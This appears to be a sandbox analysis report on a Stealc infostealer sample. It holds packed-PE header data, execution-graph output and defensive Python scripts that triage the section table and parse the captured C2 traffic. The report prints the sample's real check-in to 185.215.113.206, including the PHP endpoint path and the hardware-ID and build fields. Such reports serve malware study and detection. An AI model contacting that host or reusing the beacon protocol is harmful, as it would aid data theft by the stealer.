                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add ecx, dword ptr [edx]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    inc eax
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    push es
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax+0Ah], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add dword ptr [ecx], eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    or byte ptr [eax+00000000h], al
                                    add byte ptr [eax], al
                                    adc byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    pop es
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dh
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], ah
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ecx], al
                                    add byte ptr [eax], 00000000h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319
                                    Data Directories:
                                    Name                                  Virtual Address  Virtual Size  Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT          0x2e9050         0x64          .idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2e91f8         0x8           .idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                    Sections:
                                    Name       Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy
                                    (unnamed)  0x1000           0x2e7000      0x67600   8180d348fc65ce3d7e9667ca34585f98  unknown   unknown              unknown               unknown
                                    .rsrc      0x2e8000         0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty                 0.0
                                    .idata     0x2e9000         0x1000        0x200     049071433b9f7c843453337b0fd53002  False     0.1328125            data                  0.8946074494647072
                                    (unnamed)  0x2ea000         0x2a2000      0x200     b20b5893325b260d5d3b4d1a5a8c9d33  unknown   unknown              unknown               unknown
                                    pngrdmjc   0x58c000         0x19d000      0x19d000  d81d90d1c4e281ca410950ca3c3a37fe  False     0.9948482190148306   data                  7.954059583965191
                                    vsguhmza   0x729000         0x1000        0x400     505772e8ff7769d18ec4e93c73d7eaac  False     0.6884765625         data                  5.549866959200988
                                    .taggant   0x72a000         0x3000        0x2200    2f1afc8d24fe62afa59d37f2012419ed  False     0.06893382352941177  DOS executable (COM)  0.8455461705730766
                                    Characteristics: every section carries IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE; all except .rsrc and .idata also carry IMAGE_SCN_MEM_EXECUTE. (The .rsrc MD5 is the MD5 of empty input, consistent with its Raw Size of 0x0.)
                                    Note: the entry point (0xb2a000, RVA 0x72a000) sits in .taggant, the last section, not in a code section named by the linker; the two unnamed sections reserve 0x2e7000 and 0x2a2000 bytes of virtual space backed by only 0x67600 and 0x200 bytes on disk; five of the seven sections are writable and executable; and pngrdmjc, 0x19d000 bytes at entropy 7.95, holds nearly the whole file. This is the layout of a packed executable: a small stub at the entry point fills the large writable and executable ranges at run time and resolves the APIs it needs itself instead of declaring them in the import table.
                                    Imports:
                                    DLL           Import
                                    kernel32.dll  lstrcpy
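The section table and entry point above can be checked mechanically rather than by eye. The script below is an added example, not Joe Sandbox or sample code: it parses a PE section table with the standard library, flags the anomalies this report records (entry point in a non-standard section, writable and executable sections, virtual sizes far larger than raw sizes, section names no linker would emit), and exercises the parser on a constructed header blob built from the values in the table above, since the sample itself is not on this page. The 0x10000-byte gap threshold and the list of standard section names are assumptions chosen for illustration.

```python
"""Static triage of a PE section table: parse IMAGE_SECTION_HEADERs and flag the
layout anomalies a packed file shows. Added example; not Joe Sandbox or sample code."""
import struct

# Section characteristic flags from winnt.h.
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Names a linker normally emits (assumed list); anything else, or no name, is worth a look.
STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".gfids"}


def parse_pe(data: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER (20 bytes) directly follows the signature.
    _machine, nsections, _ts, _psym, _nsym, opt_size, _chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    if struct.unpack_from("<H", data, opt_off)[0] not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, _r, _l, _nr, _nl, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt_off + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return entry_rva, sections


def triage(entry_rva: int, sections) -> list:
    """Return human-readable findings for the anomalies a packed file typically shows."""
    findings = []
    holder = next((s for s in sections
                   if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    if holder is None:
        findings.append("entry point 0x%x lies outside every section" % entry_rva)
    elif holder["name"] not in STANDARD_NAMES:
        findings.append("entry point 0x%x in non-standard section %r" % (entry_rva, holder["name"]))
    for s in sections:
        label = s["name"] or "<unnamed>"
        if (s["chars"] & RWX) == RWX:
            findings.append("%s: writable and executable" % label)
        # Section alignment explains a small gap; flag only a gap large enough to hold unpacked code.
        if s["vsize"] > 4 * s["rawsize"] and s["vsize"] - s["rawsize"] > 0x10000:
            findings.append("%s: virtual size 0x%x far exceeds raw size 0x%x (room for unpacked code)"
                            % (label, s["vsize"], s["rawsize"]))
        if s["name"] and s["name"] not in STANDARD_NAMES:
            findings.append("%s: non-standard section name" % label)
    return findings


def build_headers(entry_rva: int, sections) -> bytes:
    """Constructed PE32 header blob (no section bodies) so the parser can run offline."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 0xE0  # PE32 optional header size
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<HBBIIII", 0x10B, 10, 0, 0, 0, 0, entry_rva).ljust(opt_size, b"\0")
    sec_hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", s["name"].encode("latin-1").ljust(8, b"\0"), s["vsize"],
                    s["va"], s["rawsize"], s.get("rawptr", 0), 0, 0, 0, 0, s["chars"])
        for s in sections)
    return dos + b"PE\0\0" + file_hdr + opt_hdr + sec_hdrs


# Section table as listed in this report (values copied from the table above; bodies not included).
INIT_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
INIT_RWX = INIT_RW | IMAGE_SCN_MEM_EXECUTE
REPORT_SECTIONS = [
    {"name": "",         "va": 0x001000, "vsize": 0x2e7000, "rawsize": 0x67600,  "chars": INIT_RWX},
    {"name": ".rsrc",    "va": 0x2e8000, "vsize": 0x001000, "rawsize": 0x0,      "chars": INIT_RW},
    {"name": ".idata",   "va": 0x2e9000, "vsize": 0x001000, "rawsize": 0x200,    "chars": INIT_RW},
    {"name": "",         "va": 0x2ea000, "vsize": 0x2a2000, "rawsize": 0x200,    "chars": INIT_RWX},
    {"name": "pngrdmjc", "va": 0x58c000, "vsize": 0x19d000, "rawsize": 0x19d000, "chars": INIT_RWX},
    {"name": "vsguhmza", "va": 0x729000, "vsize": 0x001000, "rawsize": 0x400,    "chars": INIT_RWX},
    {"name": ".taggant", "va": 0x72a000, "vsize": 0x003000, "rawsize": 0x2200,   "chars": INIT_RWX},
]
REPORT_ENTRY_RVA = 0xb2a000 - 0x400000  # Entrypoint minus Imagebase from the report


def triage_report_sample() -> list:
    """Round-trip the report's section table through the parser and return the findings."""
    entry_rva, sections = parse_pe(build_headers(REPORT_ENTRY_RVA, REPORT_SECTIONS))
    return triage(entry_rva, sections)


if __name__ == "__main__":
    for line in triage_report_sample():
        print(line)
```

Run against a real file, `parse_pe(open(path, "rb").read())` replaces the constructed header blob; the findings for this report's table are the entry point in '.taggant', five writable and executable sections, two sections with far more virtual than raw space, and three non-standard names.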
                                    Suricata IDS alerts:
                                    Timestamp                        SID      Signature                                        Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
                                    2024-10-28T09:24:20.252534+0100  2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in  1         192.168.2.4  49729        185.215.113.206  80         TCP
                                    TCP packets:
                                    Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                    Oct 28, 2024 09:24:19.047369957 CET  49729        80         192.168.2.4      185.215.113.206
                                    Oct 28, 2024 09:24:19.052855015 CET  80           49729      185.215.113.206  192.168.2.4
                                    Oct 28, 2024 09:24:19.052966118 CET  49729        80         192.168.2.4      185.215.113.206
                                    Oct 28, 2024 09:24:19.053107023 CET  49729        80         192.168.2.4      185.215.113.206
                                    Oct 28, 2024 09:24:19.058408976 CET  80           49729      185.215.113.206  192.168.2.4
                                    Oct 28, 2024 09:24:19.964807034 CET  80           49729      185.215.113.206  192.168.2.4
                                    Oct 28, 2024 09:24:19.964886904 CET  49729        80         192.168.2.4      185.215.113.206
                                    Oct 28, 2024 09:24:19.967348099 CET  49729        80         192.168.2.4      185.215.113.206
                                    Oct 28, 2024 09:24:19.972740889 CET  80           49729      185.215.113.206  192.168.2.4
                                    Oct 28, 2024 09:24:20.252351046 CET  80           49729      185.215.113.206  192.168.2.4
                                    Oct 28, 2024 09:24:20.252533913 CET  49729        80         192.168.2.4      185.215.113.206
                                    Oct 28, 2024 09:24:23.426172972 CET  49729        80         192.168.2.4      185.215.113.206
                                    • 185.215.113.206
                                    HTTP sessions:
                                    Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                    0           192.168.2.4  49729        185.215.113.206  80                6828  C:\Users\user\Desktop\file.exe
                                    HTTP traffic (Timestamp, Bytes transferred, Direction, Data):
                                    Oct 28, 2024 09:24:19.053107023 CET  90 bytes  OUT
                                    GET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    
                                    Oct 28, 2024 09:24:19.964807034 CET  203 bytes  IN
                                    HTTP/1.1 200 OK
                                    Date: Mon, 28 Oct 2024 08:24:19 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    
                                    Oct 28, 2024 09:24:19.967348099 CET  413 bytes  OUT
                                    POST /6c4adf523b719729.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB
                                    Host: 185.215.113.206
                                    Content-Length: 211
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 33 31 41 31 33 43 41 43 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a
                                    Data Ascii (line breaks restored from the CR LF pairs in the raw bytes):
                                    ------HDBGHDHCGHCAAKEBKECB
                                    Content-Disposition: form-data; name="hwid"
                                    
                                    C131A13CAC433430373531
                                    ------HDBGHDHCGHCAAKEBKECB
                                    Content-Disposition: form-data; name="build"
                                    
                                    tale
                                    ------HDBGHDHCGHCAAKEBKECB--
                                    
                                    Oct 28, 2024 09:24:20.252351046 CET  210 bytes  IN
                                    HTTP/1.1 200 OK
                                    Date: Mon, 28 Oct 2024 08:24:20 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s= (base64 for "block")
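The two requests above are the whole Stealc check-in: a bare GET / to the host, then a multipart POST to /6c4adf523b719729.php carrying a hwid field and a build field (here "tale"), answered with the base64 string YmxvY2s=, which decodes to "block". The script below is an added example, not code from Joe Sandbox or from the sample: it reconstructs the request bytes from the Data Raw dump on this page, parses the HTTP headers and the multipart body (any multipart/form-data body, not only this one), checks that Content-Length matches the body, and decodes the reply. The request bytes, boundary and reply are copied from the capture; the parsing code is constructed here.

```python
"""Parse the Stealc check-in captured above: pull the multipart fields out of the POST
and decode the server's base64 reply. Added example, not Joe Sandbox or Stealc code."""
import base64
import re

# Request and reply bytes reconstructed from the "Data Raw" hex dumps in this report
# (constructed here for an offline run; the hex on the page is the source of truth).
CHECKIN_REQUEST = (
    b"POST /6c4adf523b719729.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECB\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------HDBGHDHCGHCAAKEBKECB\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"C131A13CAC433430373531\r\n"
    b"------HDBGHDHCGHCAAKEBKECB\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"tale\r\n"
    b"------HDBGHDHCGHCAAKEBKECB--\r\n"
)
CHECKIN_REPLY_BODY = b"YmxvY2s="


def split_http_request(raw: bytes):
    """Return (request line, {lower-cased header: value}, body) for one HTTP/1.x request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: value bytes} for a multipart/form-data body.

    The boundary in the header lacks the leading "--" that every delimiter line carries.
    """
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no boundary in Content-Type")
    delimiter = b"--" + m.group(1).encode("latin-1")
    fields = {}
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        # chunk[2:] drops the CRLF that follows the delimiter line.
        part_head, _, part_body = chunk[2:].partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            value = part_body[:-2] if part_body.endswith(b"\r\n") else part_body
            fields[name.group(1).decode("latin-1")] = value
    return fields


def parse_checkin(raw_request: bytes) -> dict:
    """Decode the check-in POST into its request path, hwid and build fields."""
    request_line, headers, body = split_http_request(raw_request)
    declared = int(headers.get("content-length", "0"))
    if declared != len(body):
        raise ValueError("Content-Length %d does not match body length %d" % (declared, len(body)))
    fields = parse_multipart(body, headers["content-type"])
    return {"path": request_line.split(" ")[1],
            "hwid": fields.get("hwid", b"").decode("latin-1"),
            "build": fields.get("build", b"").decode("latin-1")}


def decode_reply(body: bytes) -> str:
    """The C2 answers with a base64 string; return it decoded."""
    return base64.b64decode(body).decode("latin-1")


if __name__ == "__main__":
    print(parse_checkin(CHECKIN_REQUEST))   # {'path': '/6c4adf523b719729.php', 'hwid': 'C131A13CAC433430373531', 'build': 'tale'}
    print(decode_reply(CHECKIN_REPLY_BODY))  # block
```

The same two functions work on a body pulled out of a pcap or proxy log; the Content-Length check is there because a truncated capture silently yields a partial field list otherwise.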


                                    Target ID:0
                                    Start time:04:24:16
                                    Start date:28/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0xd30000
                                    File size:2'129'920 bytes
                                    MD5 hash:F522FE27067DAEA4F7987BF85EC1E287
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1721174254.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:3.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:3.5%
                                      Total number of Nodes:1327
                                      Total number of Limit Nodes:24
                                      Execution graph (rendered as an interactive figure on the original page; the call flow below is recovered from the graph's node and edge data, with node addresses relative to the runtime image base 0xd30000):
                                      • d46c90, the root of the graph, calls d322a0, which makes 43 consecutive calls to d34610 (RtlAllocateHeap, VirtualProtect) from d322b4 through d326ce, 0x19 bytes apart.
                                      • d49bb0 reads the PEB (d49aa0); d49de3 then issues five LoadLibraryA calls and d49e44, d49e66, d49e9f, d49ec1 and d49ee2 resolve functions with GetProcAddress. An alternative path through d49bca (d49bdc, 21 API calls) rejoins at d49de3.
                                      • d46ca0 → d4aa50 (lstrcpy) → d311d0: a chain of environment checks in which every step has an ExitProcess branch. d311e8 exits at d3120f or continues to d31160 GetSystemInfo (exit at d3117c), then d31110 GetCurrentProcess, VirtualAllocExNuma (exit at d31141), then d310a0 VirtualAlloc / VirtualFree, then d31220 → d48b40 GlobalMemoryStatusEx → d31249 __aulldiv (exit at d31292).
                                      • d46a10 GetUserDefaultLangID → d46a32, which exits the process through one of five branches (d46a43, d46a4d, d46a57, d46a61, d46a6b) or continues at d46a73.
                                      • d31190: d47a70 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA) and d479e0 (GetProcessHeap, RtlAllocateHeap, GetUserNameA); d311b7 either continues at d311cc or calls ExitProcess at d311c4. After d311cc, d479e0 (GetUserNameA) and d47a70 (GetComputerNameA) are called again around d46cd0.
                                      • d46ce3 through d46d20: five calls to d4acc0 (lstrlen, lstrcpy, lstrcat via d4aa20 / d4aab0) and one to d4abb0 (lstrcpy) build a string. d46d29 then either proceeds straight to d46dac or calls OpenEventA at d46d62: d46d95 (CloseHandle, Sleep) loops back to d46d29 through d46daa, while d46d79 → d46d81 CreateEventA continues to d46dac, consistent with a single-instance check on a named event.
                                      • d46dac → d46bc0 GetSystemTime → d46ac0 (string built with d4aa50, d4acc0, d4abb0) → d46c38 sscanf → d46c4a SystemTimeToFileTime ×2 → continue at d46c80 or ExitProcess at d46c78.
                                      • d45d60 onward is the collection stage: d4ab30 (lstrlen, lstrcpy), d46680 (lstrcpy ×4 via d4abb0), d326f0 (a second run of d34610 calls starting at d32704), d47690 GetWindowsDirectoryA, d348d0, d419f0, then repeated d4aa50 / d31590 (lstrcpy) / d359b0 (34 API calls) sequences around d41280 (lstrlen, lstrcpy), d40fc0 (StrCmpCA ×3, lstrlen, lstrcpy), d41170 (StrCmpCA, lstrlen, lstrcpy), d41c60 (115 API calls), d35000 (7 API calls), d408a0 (277 API calls), d413c0 (StrCmpCA, lstrlen, lstrcpy), d31ec0 (59 API calls), d41520 (19 API calls), d44010 (67 API calls), d437b0 (31 API calls), d44300 (57 API calls), d449d0 (88 API calls), d44e00 (61 API calls), d44fc0 (65 API calls), d45190 (63 API calls), d45350 (43 API calls), d37770 (106 API calls), d452a0 (61 API calls), d491a0 (46 API calls) and d468d0 (9 API calls).
                                      • d46588 → d46db6: CloseHandle, ExitProcess (end of the graph).
36996->36997 36998 d34610 2 API calls 36997->36998 36999 d33190 36998->36999 37000 d34610 2 API calls 36999->37000 37001 d331a9 37000->37001 37002 d34610 2 API calls 37001->37002 37003 d331c2 37002->37003 37004 d34610 2 API calls 37003->37004 37005 d331db 37004->37005 37006 d34610 2 API calls 37005->37006 37007 d331f4 37006->37007 37008 d34610 2 API calls 37007->37008 37009 d3320d 37008->37009 37010 d34610 2 API calls 37009->37010 37011 d33226 37010->37011 37012 d34610 2 API calls 37011->37012 37013 d3323f 37012->37013 37014 d34610 2 API calls 37013->37014 37015 d33258 37014->37015 37016 d34610 2 API calls 37015->37016 37017 d33271 37016->37017 37018 d34610 2 API calls 37017->37018 37019 d3328a 37018->37019 37020 d34610 2 API calls 37019->37020 37021 d332a3 37020->37021 37022 d34610 2 API calls 37021->37022 37023 d332bc 37022->37023 37024 d34610 2 API calls 37023->37024 37025 d332d5 37024->37025 37026 d34610 2 API calls 37025->37026 37027 d332ee 37026->37027 37028 d34610 2 API calls 37027->37028 37029 d33307 37028->37029 37030 d34610 2 API calls 37029->37030 37031 d33320 37030->37031 37032 d34610 2 API calls 37031->37032 37033 d33339 37032->37033 37034 d34610 2 API calls 37033->37034 37035 d33352 37034->37035 37036 d34610 2 API calls 37035->37036 37037 d3336b 37036->37037 37038 d34610 2 API calls 37037->37038 37039 d33384 37038->37039 37040 d34610 2 API calls 37039->37040 37041 d3339d 37040->37041 37042 d34610 2 API calls 37041->37042 37043 d333b6 37042->37043 37044 d34610 2 API calls 37043->37044 37045 d333cf 37044->37045 37046 d34610 2 API calls 37045->37046 37047 d333e8 37046->37047 37048 d34610 2 API calls 37047->37048 37049 d33401 37048->37049 37050 d34610 2 API calls 37049->37050 37051 d3341a 37050->37051 37052 d34610 2 API calls 37051->37052 37053 d33433 37052->37053 37054 d34610 2 API calls 37053->37054 37055 d3344c 37054->37055 37056 d34610 2 API calls 37055->37056 37057 d33465 37056->37057 37058 d34610 2 API calls 37057->37058 37059 d3347e 37058->37059 
37060 d34610 2 API calls 37059->37060 37061 d33497 37060->37061 37062 d34610 2 API calls 37061->37062 37063 d334b0 37062->37063 37064 d34610 2 API calls 37063->37064 37065 d334c9 37064->37065 37066 d34610 2 API calls 37065->37066 37067 d334e2 37066->37067 37068 d34610 2 API calls 37067->37068 37069 d334fb 37068->37069 37070 d34610 2 API calls 37069->37070 37071 d33514 37070->37071 37072 d34610 2 API calls 37071->37072 37073 d3352d 37072->37073 37074 d34610 2 API calls 37073->37074 37075 d33546 37074->37075 37076 d34610 2 API calls 37075->37076 37077 d3355f 37076->37077 37078 d34610 2 API calls 37077->37078 37079 d33578 37078->37079 37080 d34610 2 API calls 37079->37080 37081 d33591 37080->37081 37082 d34610 2 API calls 37081->37082 37083 d335aa 37082->37083 37084 d34610 2 API calls 37083->37084 37085 d335c3 37084->37085 37086 d34610 2 API calls 37085->37086 37087 d335dc 37086->37087 37088 d34610 2 API calls 37087->37088 37089 d335f5 37088->37089 37090 d34610 2 API calls 37089->37090 37091 d3360e 37090->37091 37092 d34610 2 API calls 37091->37092 37093 d33627 37092->37093 37094 d34610 2 API calls 37093->37094 37095 d33640 37094->37095 37096 d34610 2 API calls 37095->37096 37097 d33659 37096->37097 37098 d34610 2 API calls 37097->37098 37099 d33672 37098->37099 37100 d34610 2 API calls 37099->37100 37101 d3368b 37100->37101 37102 d34610 2 API calls 37101->37102 37103 d336a4 37102->37103 37104 d34610 2 API calls 37103->37104 37105 d336bd 37104->37105 37106 d34610 2 API calls 37105->37106 37107 d336d6 37106->37107 37108 d34610 2 API calls 37107->37108 37109 d336ef 37108->37109 37110 d34610 2 API calls 37109->37110 37111 d33708 37110->37111 37112 d34610 2 API calls 37111->37112 37113 d33721 37112->37113 37114 d34610 2 API calls 37113->37114 37115 d3373a 37114->37115 37116 d34610 2 API calls 37115->37116 37117 d33753 37116->37117 37118 d34610 2 API calls 37117->37118 37119 d3376c 37118->37119 37120 d34610 2 API calls 37119->37120 37121 d33785 37120->37121 37122 d34610 2 
API calls 37121->37122 37123 d3379e 37122->37123 37124 d34610 2 API calls 37123->37124 37125 d337b7 37124->37125 37126 d34610 2 API calls 37125->37126 37127 d337d0 37126->37127 37128 d34610 2 API calls 37127->37128 37129 d337e9 37128->37129 37130 d34610 2 API calls 37129->37130 37131 d33802 37130->37131 37132 d34610 2 API calls 37131->37132 37133 d3381b 37132->37133 37134 d34610 2 API calls 37133->37134 37135 d33834 37134->37135 37136 d34610 2 API calls 37135->37136 37137 d3384d 37136->37137 37138 d34610 2 API calls 37137->37138 37139 d33866 37138->37139 37140 d34610 2 API calls 37139->37140 37141 d3387f 37140->37141 37142 d34610 2 API calls 37141->37142 37143 d33898 37142->37143 37144 d34610 2 API calls 37143->37144 37145 d338b1 37144->37145 37146 d34610 2 API calls 37145->37146 37147 d338ca 37146->37147 37148 d34610 2 API calls 37147->37148 37149 d338e3 37148->37149 37150 d34610 2 API calls 37149->37150 37151 d338fc 37150->37151 37152 d34610 2 API calls 37151->37152 37153 d33915 37152->37153 37154 d34610 2 API calls 37153->37154 37155 d3392e 37154->37155 37156 d34610 2 API calls 37155->37156 37157 d33947 37156->37157 37158 d34610 2 API calls 37157->37158 37159 d33960 37158->37159 37160 d34610 2 API calls 37159->37160 37161 d33979 37160->37161 37162 d34610 2 API calls 37161->37162 37163 d33992 37162->37163 37164 d34610 2 API calls 37163->37164 37165 d339ab 37164->37165 37166 d34610 2 API calls 37165->37166 37167 d339c4 37166->37167 37168 d34610 2 API calls 37167->37168 37169 d339dd 37168->37169 37170 d34610 2 API calls 37169->37170 37171 d339f6 37170->37171 37172 d34610 2 API calls 37171->37172 37173 d33a0f 37172->37173 37174 d34610 2 API calls 37173->37174 37175 d33a28 37174->37175 37176 d34610 2 API calls 37175->37176 37177 d33a41 37176->37177 37178 d34610 2 API calls 37177->37178 37179 d33a5a 37178->37179 37180 d34610 2 API calls 37179->37180 37181 d33a73 37180->37181 37182 d34610 2 API calls 37181->37182 37183 d33a8c 37182->37183 37184 d34610 2 API calls 
